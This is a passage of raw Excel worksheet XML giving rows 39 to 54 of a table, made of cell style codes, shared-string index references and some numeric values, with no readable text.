        <v>10</v>
      </c>
      <c r="AD39" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE39" s="50" t="s">
        <v>313</v>
      </c>
      <c r="AF39" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG39" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="40" ht="153.75" customHeight="1">
      <c r="B40" s="42" t="s">
        <v>327</v>
      </c>
      <c r="C40" s="43" t="s">
        <v>321</v>
      </c>
      <c r="D40" s="43" t="s">
        <v>322</v>
      </c>
      <c r="E40" s="43" t="s">
        <v>323</v>
      </c>
      <c r="F40" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G40" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H40" s="44" t="s">
        <v>328</v>
      </c>
      <c r="I40" s="44" t="s">
        <v>226</v>
      </c>
      <c r="J40" s="44" t="s">
        <v>329</v>
      </c>
      <c r="K40" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L40" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M40" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N40" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O40" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P40" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q40" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R40" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S40" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T40" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U40" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V40" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W40" s="49" t="s">
        <v>10</v>
      </c>
      <c r="X40" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y40" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z40" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA40" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB40" s="62" t="s">
        <v>326</v>
      </c>
      <c r="AC40" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD40" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE40" s="50" t="s">
        <v>313</v>
      </c>
      <c r="AF40" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG40" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="41" ht="153.75" customHeight="1">
      <c r="B41" s="42" t="s">
        <v>288</v>
      </c>
      <c r="C41" s="43" t="s">
        <v>321</v>
      </c>
      <c r="D41" s="43" t="s">
        <v>322</v>
      </c>
      <c r="E41" s="43" t="s">
        <v>323</v>
      </c>
      <c r="F41" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G41" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H41" s="44" t="s">
        <v>330</v>
      </c>
      <c r="I41" s="44" t="s">
        <v>226</v>
      </c>
      <c r="J41" s="44" t="s">
        <v>331</v>
      </c>
      <c r="K41" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L41" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M41" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N41" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O41" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P41" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q41" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R41" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S41" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T41" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U41" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V41" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W41" s="49" t="s">
        <v>10</v>
      </c>
      <c r="X41" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y41" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z41" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA41" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB41" s="62" t="s">
        <v>326</v>
      </c>
      <c r="AC41" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD41" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE41" s="50" t="s">
        <v>313</v>
      </c>
      <c r="AF41" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG41" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="42" ht="153.75" customHeight="1">
      <c r="B42" s="42" t="s">
        <v>288</v>
      </c>
      <c r="C42" s="43" t="s">
        <v>321</v>
      </c>
      <c r="D42" s="43" t="s">
        <v>322</v>
      </c>
      <c r="E42" s="43" t="s">
        <v>323</v>
      </c>
      <c r="F42" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G42" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H42" s="44" t="s">
        <v>332</v>
      </c>
      <c r="I42" s="44" t="s">
        <v>226</v>
      </c>
      <c r="J42" s="44" t="s">
        <v>333</v>
      </c>
      <c r="K42" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L42" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M42" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N42" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O42" s="47">
        <v>2013028.0</v>
      </c>
      <c r="P42" s="47">
        <v>1.0</v>
      </c>
      <c r="Q42" s="47">
        <v>1.0</v>
      </c>
      <c r="R42" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S42" s="48" t="s">
        <v>334</v>
      </c>
      <c r="T42" s="48">
        <v>2.0</v>
      </c>
      <c r="U42" s="48">
        <v>2.0</v>
      </c>
      <c r="V42" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W42" s="49" t="s">
        <v>335</v>
      </c>
      <c r="X42" s="49">
        <v>6.0</v>
      </c>
      <c r="Y42" s="49">
        <v>10822.0</v>
      </c>
      <c r="Z42" s="46">
        <v>2002752.2002749</v>
      </c>
      <c r="AA42" s="61" t="s">
        <v>181</v>
      </c>
      <c r="AB42" s="62" t="s">
        <v>336</v>
      </c>
      <c r="AC42" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD42" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE42" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF42" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG42" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="43" ht="153.75" customHeight="1">
      <c r="B43" s="42" t="s">
        <v>288</v>
      </c>
      <c r="C43" s="43" t="s">
        <v>337</v>
      </c>
      <c r="D43" s="43" t="s">
        <v>338</v>
      </c>
      <c r="E43" s="43" t="s">
        <v>339</v>
      </c>
      <c r="F43" s="52" t="s">
        <v>340</v>
      </c>
      <c r="G43" s="43" t="s">
        <v>341</v>
      </c>
      <c r="H43" s="44" t="s">
        <v>342</v>
      </c>
      <c r="I43" s="44" t="s">
        <v>343</v>
      </c>
      <c r="J43" s="44" t="s">
        <v>344</v>
      </c>
      <c r="K43" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L43" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M43" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N43" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O43" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P43" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q43" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R43" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S43" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T43" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U43" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V43" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W43" s="49" t="s">
        <v>345</v>
      </c>
      <c r="X43" s="49">
        <v>3.0</v>
      </c>
      <c r="Y43" s="49">
        <v>10.0</v>
      </c>
      <c r="Z43" s="46" t="s">
        <v>346</v>
      </c>
      <c r="AA43" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB43" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AC43" s="62" t="s">
        <v>347</v>
      </c>
      <c r="AD43" s="44" t="s">
        <v>68</v>
      </c>
      <c r="AE43" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF43" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG43" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="44" ht="153.75" customHeight="1">
      <c r="B44" s="42" t="s">
        <v>288</v>
      </c>
      <c r="C44" s="43" t="s">
        <v>337</v>
      </c>
      <c r="D44" s="43" t="s">
        <v>338</v>
      </c>
      <c r="E44" s="43" t="s">
        <v>339</v>
      </c>
      <c r="F44" s="52" t="s">
        <v>340</v>
      </c>
      <c r="G44" s="43" t="s">
        <v>341</v>
      </c>
      <c r="H44" s="44" t="s">
        <v>342</v>
      </c>
      <c r="I44" s="44" t="s">
        <v>282</v>
      </c>
      <c r="J44" s="44" t="s">
        <v>348</v>
      </c>
      <c r="K44" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L44" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M44" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N44" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O44" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P44" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q44" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R44" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S44" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T44" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U44" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V44" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W44" s="49" t="s">
        <v>10</v>
      </c>
      <c r="X44" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y44" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z44" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA44" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB44" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AC44" s="62" t="s">
        <v>349</v>
      </c>
      <c r="AD44" s="44" t="s">
        <v>57</v>
      </c>
      <c r="AE44" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF44" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG44" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="45" ht="153.75" customHeight="1">
      <c r="B45" s="42" t="s">
        <v>288</v>
      </c>
      <c r="C45" s="43" t="s">
        <v>337</v>
      </c>
      <c r="D45" s="43" t="s">
        <v>338</v>
      </c>
      <c r="E45" s="43" t="s">
        <v>339</v>
      </c>
      <c r="F45" s="52" t="s">
        <v>340</v>
      </c>
      <c r="G45" s="43" t="s">
        <v>341</v>
      </c>
      <c r="H45" s="44" t="s">
        <v>350</v>
      </c>
      <c r="I45" s="44" t="s">
        <v>351</v>
      </c>
      <c r="J45" s="44" t="s">
        <v>352</v>
      </c>
      <c r="K45" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L45" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M45" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N45" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O45" s="47">
        <v>2100366.0</v>
      </c>
      <c r="P45" s="47">
        <v>1.0</v>
      </c>
      <c r="Q45" s="47">
        <v>10.0</v>
      </c>
      <c r="R45" s="46">
        <v>2100366.0</v>
      </c>
      <c r="S45" s="48">
        <v>2100366.0</v>
      </c>
      <c r="T45" s="48">
        <v>1.0</v>
      </c>
      <c r="U45" s="48">
        <v>10.0</v>
      </c>
      <c r="V45" s="46">
        <v>2100366.0</v>
      </c>
      <c r="W45" s="49" t="s">
        <v>353</v>
      </c>
      <c r="X45" s="49">
        <v>6.0</v>
      </c>
      <c r="Y45" s="49">
        <v>38.0</v>
      </c>
      <c r="Z45" s="46" t="s">
        <v>354</v>
      </c>
      <c r="AA45" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB45" s="62" t="s">
        <v>355</v>
      </c>
      <c r="AC45" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD45" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE45" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF45" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG45" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="46" ht="153.75" customHeight="1">
      <c r="B46" s="42" t="s">
        <v>288</v>
      </c>
      <c r="C46" s="43" t="s">
        <v>337</v>
      </c>
      <c r="D46" s="43" t="s">
        <v>338</v>
      </c>
      <c r="E46" s="43" t="s">
        <v>339</v>
      </c>
      <c r="F46" s="52" t="s">
        <v>356</v>
      </c>
      <c r="G46" s="43" t="s">
        <v>357</v>
      </c>
      <c r="H46" s="44" t="s">
        <v>356</v>
      </c>
      <c r="I46" s="44" t="s">
        <v>358</v>
      </c>
      <c r="J46" s="44" t="s">
        <v>359</v>
      </c>
      <c r="K46" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L46" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M46" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N46" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O46" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P46" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q46" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R46" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S46" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T46" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U46" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V46" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W46" s="49" t="s">
        <v>360</v>
      </c>
      <c r="X46" s="49">
        <v>3.0</v>
      </c>
      <c r="Y46" s="49">
        <v>75.0</v>
      </c>
      <c r="Z46" s="46" t="s">
        <v>361</v>
      </c>
      <c r="AA46" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB46" s="62" t="s">
        <v>362</v>
      </c>
      <c r="AC46" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD46" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE46" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF46" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG46" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="47" ht="153.75" customHeight="1">
      <c r="B47" s="42" t="s">
        <v>288</v>
      </c>
      <c r="C47" s="43" t="s">
        <v>337</v>
      </c>
      <c r="D47" s="43" t="s">
        <v>338</v>
      </c>
      <c r="E47" s="43" t="s">
        <v>339</v>
      </c>
      <c r="F47" s="52" t="s">
        <v>340</v>
      </c>
      <c r="G47" s="43" t="s">
        <v>341</v>
      </c>
      <c r="H47" s="44" t="s">
        <v>363</v>
      </c>
      <c r="I47" s="44" t="s">
        <v>132</v>
      </c>
      <c r="J47" s="44" t="s">
        <v>364</v>
      </c>
      <c r="K47" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L47" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M47" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N47" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O47" s="47">
        <v>2100366.0</v>
      </c>
      <c r="P47" s="47">
        <v>1.0</v>
      </c>
      <c r="Q47" s="47">
        <v>10.0</v>
      </c>
      <c r="R47" s="46">
        <v>2100366.0</v>
      </c>
      <c r="S47" s="48">
        <v>2100366.0</v>
      </c>
      <c r="T47" s="48">
        <v>1.0</v>
      </c>
      <c r="U47" s="48">
        <v>10.0</v>
      </c>
      <c r="V47" s="46">
        <v>2100366.0</v>
      </c>
      <c r="W47" s="49" t="s">
        <v>353</v>
      </c>
      <c r="X47" s="49">
        <v>6.0</v>
      </c>
      <c r="Y47" s="49">
        <v>30.0</v>
      </c>
      <c r="Z47" s="46" t="s">
        <v>354</v>
      </c>
      <c r="AA47" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB47" s="62" t="s">
        <v>355</v>
      </c>
      <c r="AC47" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD47" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE47" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF47" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG47" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="48" ht="153.75" customHeight="1">
      <c r="B48" s="42" t="s">
        <v>288</v>
      </c>
      <c r="C48" s="43" t="s">
        <v>337</v>
      </c>
      <c r="D48" s="43" t="s">
        <v>338</v>
      </c>
      <c r="E48" s="43" t="s">
        <v>339</v>
      </c>
      <c r="F48" s="52" t="s">
        <v>10</v>
      </c>
      <c r="G48" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H48" s="44" t="s">
        <v>365</v>
      </c>
      <c r="I48" s="44" t="s">
        <v>366</v>
      </c>
      <c r="J48" s="44" t="s">
        <v>367</v>
      </c>
      <c r="K48" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L48" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M48" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N48" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O48" s="47">
        <v>2100366.0</v>
      </c>
      <c r="P48" s="47">
        <v>1.0</v>
      </c>
      <c r="Q48" s="47">
        <v>14.0</v>
      </c>
      <c r="R48" s="46">
        <v>2100366.0</v>
      </c>
      <c r="S48" s="48">
        <v>2100366.0</v>
      </c>
      <c r="T48" s="48">
        <v>1.0</v>
      </c>
      <c r="U48" s="48">
        <v>14.0</v>
      </c>
      <c r="V48" s="46">
        <v>2100366.0</v>
      </c>
      <c r="W48" s="49" t="s">
        <v>368</v>
      </c>
      <c r="X48" s="49">
        <v>5.0</v>
      </c>
      <c r="Y48" s="49">
        <v>46.0</v>
      </c>
      <c r="Z48" s="46" t="s">
        <v>369</v>
      </c>
      <c r="AA48" s="61" t="s">
        <v>188</v>
      </c>
      <c r="AB48" s="62" t="s">
        <v>370</v>
      </c>
      <c r="AC48" s="62" t="s">
        <v>371</v>
      </c>
      <c r="AD48" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE48" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF48" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG48" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="49" ht="153.75" customHeight="1">
      <c r="B49" s="42" t="s">
        <v>288</v>
      </c>
      <c r="C49" s="43" t="s">
        <v>337</v>
      </c>
      <c r="D49" s="43" t="s">
        <v>338</v>
      </c>
      <c r="E49" s="43" t="s">
        <v>339</v>
      </c>
      <c r="F49" s="52" t="s">
        <v>10</v>
      </c>
      <c r="G49" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H49" s="44" t="s">
        <v>372</v>
      </c>
      <c r="I49" s="44" t="s">
        <v>373</v>
      </c>
      <c r="J49" s="44" t="s">
        <v>374</v>
      </c>
      <c r="K49" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L49" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M49" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N49" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O49" s="47">
        <v>2100366.0</v>
      </c>
      <c r="P49" s="47">
        <v>1.0</v>
      </c>
      <c r="Q49" s="47">
        <v>30.0</v>
      </c>
      <c r="R49" s="46">
        <v>2100366.0</v>
      </c>
      <c r="S49" s="48">
        <v>2100366.0</v>
      </c>
      <c r="T49" s="48">
        <v>1.0</v>
      </c>
      <c r="U49" s="48">
        <v>30.0</v>
      </c>
      <c r="V49" s="46">
        <v>2100366.0</v>
      </c>
      <c r="W49" s="49" t="s">
        <v>375</v>
      </c>
      <c r="X49" s="49">
        <v>7.0</v>
      </c>
      <c r="Y49" s="49">
        <v>96.0</v>
      </c>
      <c r="Z49" s="46" t="s">
        <v>376</v>
      </c>
      <c r="AA49" s="61" t="s">
        <v>188</v>
      </c>
      <c r="AB49" s="62" t="s">
        <v>377</v>
      </c>
      <c r="AC49" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD49" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE49" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF49" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG49" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="50" ht="153.75" customHeight="1">
      <c r="B50" s="42" t="s">
        <v>288</v>
      </c>
      <c r="C50" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D50" s="43" t="s">
        <v>378</v>
      </c>
      <c r="E50" s="43" t="s">
        <v>379</v>
      </c>
      <c r="F50" s="52" t="s">
        <v>10</v>
      </c>
      <c r="G50" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H50" s="44" t="s">
        <v>380</v>
      </c>
      <c r="I50" s="44" t="s">
        <v>381</v>
      </c>
      <c r="J50" s="44" t="s">
        <v>382</v>
      </c>
      <c r="K50" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L50" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M50" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N50" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O50" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P50" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q50" s="47"/>
      <c r="R50" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S50" s="57" t="s">
        <v>383</v>
      </c>
      <c r="T50" s="48">
        <v>3.0</v>
      </c>
      <c r="U50" s="48">
        <v>6.0</v>
      </c>
      <c r="V50" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W50" s="49" t="s">
        <v>384</v>
      </c>
      <c r="X50" s="49">
        <v>5.0</v>
      </c>
      <c r="Y50" s="49"/>
      <c r="Z50" s="46">
        <v>2002752.2002749</v>
      </c>
      <c r="AA50" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB50" s="62" t="s">
        <v>385</v>
      </c>
      <c r="AC50" s="62" t="s">
        <v>386</v>
      </c>
      <c r="AD50" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE50" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF50" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG50" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="51" ht="153.75" customHeight="1">
      <c r="B51" s="71" t="s">
        <v>288</v>
      </c>
      <c r="C51" s="72" t="s">
        <v>10</v>
      </c>
      <c r="D51" s="72" t="s">
        <v>387</v>
      </c>
      <c r="E51" s="72" t="s">
        <v>388</v>
      </c>
      <c r="F51" s="73" t="s">
        <v>389</v>
      </c>
      <c r="G51" s="72" t="s">
        <v>390</v>
      </c>
      <c r="H51" s="74" t="s">
        <v>391</v>
      </c>
      <c r="I51" s="74" t="s">
        <v>392</v>
      </c>
      <c r="J51" s="74" t="s">
        <v>393</v>
      </c>
      <c r="K51" s="75" t="s">
        <v>10</v>
      </c>
      <c r="L51" s="75" t="s">
        <v>10</v>
      </c>
      <c r="M51" s="75" t="s">
        <v>10</v>
      </c>
      <c r="N51" s="76" t="s">
        <v>10</v>
      </c>
      <c r="O51" s="77" t="s">
        <v>10</v>
      </c>
      <c r="P51" s="77" t="s">
        <v>10</v>
      </c>
      <c r="Q51" s="77" t="s">
        <v>10</v>
      </c>
      <c r="R51" s="76" t="s">
        <v>10</v>
      </c>
      <c r="S51" s="78" t="s">
        <v>10</v>
      </c>
      <c r="T51" s="78" t="s">
        <v>10</v>
      </c>
      <c r="U51" s="78" t="s">
        <v>10</v>
      </c>
      <c r="V51" s="76" t="s">
        <v>10</v>
      </c>
      <c r="W51" s="79" t="s">
        <v>75</v>
      </c>
      <c r="X51" s="79">
        <v>2.0</v>
      </c>
      <c r="Y51" s="79">
        <v>2.0</v>
      </c>
      <c r="Z51" s="76" t="s">
        <v>75</v>
      </c>
      <c r="AA51" s="80" t="s">
        <v>54</v>
      </c>
      <c r="AB51" s="81" t="s">
        <v>394</v>
      </c>
      <c r="AC51" s="81" t="s">
        <v>10</v>
      </c>
      <c r="AD51" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE51" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF51" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG51" s="82" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="52" ht="153.75" customHeight="1">
      <c r="B52" s="83" t="s">
        <v>337</v>
      </c>
      <c r="C52" s="84" t="s">
        <v>10</v>
      </c>
      <c r="D52" s="84" t="s">
        <v>395</v>
      </c>
      <c r="E52" s="84" t="s">
        <v>396</v>
      </c>
      <c r="F52" s="85" t="s">
        <v>397</v>
      </c>
      <c r="G52" s="84" t="s">
        <v>398</v>
      </c>
      <c r="H52" s="86" t="s">
        <v>399</v>
      </c>
      <c r="I52" s="86" t="s">
        <v>282</v>
      </c>
      <c r="J52" s="86" t="s">
        <v>400</v>
      </c>
      <c r="K52" s="87" t="s">
        <v>401</v>
      </c>
      <c r="L52" s="88">
        <v>2.0</v>
      </c>
      <c r="M52" s="88">
        <v>792.0</v>
      </c>
      <c r="N52" s="89" t="s">
        <v>10</v>
      </c>
      <c r="O52" s="90" t="s">
        <v>402</v>
      </c>
      <c r="P52" s="91">
        <v>3.0</v>
      </c>
      <c r="Q52" s="91">
        <v>1188.0</v>
      </c>
      <c r="R52" s="89">
        <v>2101411.0</v>
      </c>
      <c r="S52" s="92" t="s">
        <v>402</v>
      </c>
      <c r="T52" s="93">
        <v>3.0</v>
      </c>
      <c r="U52" s="93">
        <v>1980.0</v>
      </c>
      <c r="V52" s="89">
        <v>2101411.0</v>
      </c>
      <c r="W52" s="94" t="s">
        <v>403</v>
      </c>
      <c r="X52" s="94">
        <v>6.0</v>
      </c>
      <c r="Y52" s="94">
        <v>2380.0</v>
      </c>
      <c r="Z52" s="89" t="s">
        <v>404</v>
      </c>
      <c r="AA52" s="95" t="s">
        <v>54</v>
      </c>
      <c r="AB52" s="96" t="s">
        <v>405</v>
      </c>
      <c r="AC52" s="96" t="s">
        <v>406</v>
      </c>
      <c r="AD52" s="44" t="s">
        <v>68</v>
      </c>
      <c r="AE52" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF52" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG52" s="97" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="53" ht="153.75" customHeight="1">
      <c r="B53" s="42" t="s">
        <v>337</v>
      </c>
      <c r="C53" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D53" s="43" t="s">
        <v>407</v>
      </c>
      <c r="E53" s="43" t="s">
        <v>408</v>
      </c>
      <c r="F53" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G53" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H53" s="44" t="s">
        <v>168</v>
      </c>
      <c r="I53" s="44" t="s">
        <v>169</v>
      </c>
      <c r="J53" s="44" t="s">
        <v>409</v>
      </c>
      <c r="K53" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L53" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M53" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N53" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O53" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P53" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q53" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R53" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S53" s="48">
        <v>50447.0</v>
      </c>
      <c r="T53" s="48">
        <v>1.0</v>
      </c>
      <c r="U53" s="48">
        <v>3.0</v>
      </c>
      <c r="V53" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W53" s="49" t="s">
        <v>171</v>
      </c>
      <c r="X53" s="49">
        <v>3.0</v>
      </c>
      <c r="Y53" s="49">
        <v>7.0</v>
      </c>
      <c r="Z53" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA53" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB53" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AC53" s="62" t="s">
        <v>410</v>
      </c>
      <c r="AD53" s="44" t="s">
        <v>57</v>
      </c>
      <c r="AE53" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF53" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG53" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="54" ht="153.75" customHeight="1">
      <c r="B54" s="42" t="s">
        <v>337</v>
      </c>
      <c r="C54" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D54" s="43" t="s">
        <v>411</v>
      </c>
      <c r="E54" s="43" t="s">
        <v>412</v>
      </c>
      <c r="F54" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G54" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H54" s="44" t="s">
        <v>413</v>
      </c>
      <c r="I54" s="44" t="s">
        <v>414</v>
      </c>
      <c r="J54" s="44" t="s">
        <v>415</v>
      </c>
      <c r="K54" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L54" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M54" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N54" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O54" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P54" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q54" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R54" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S54" s="57">
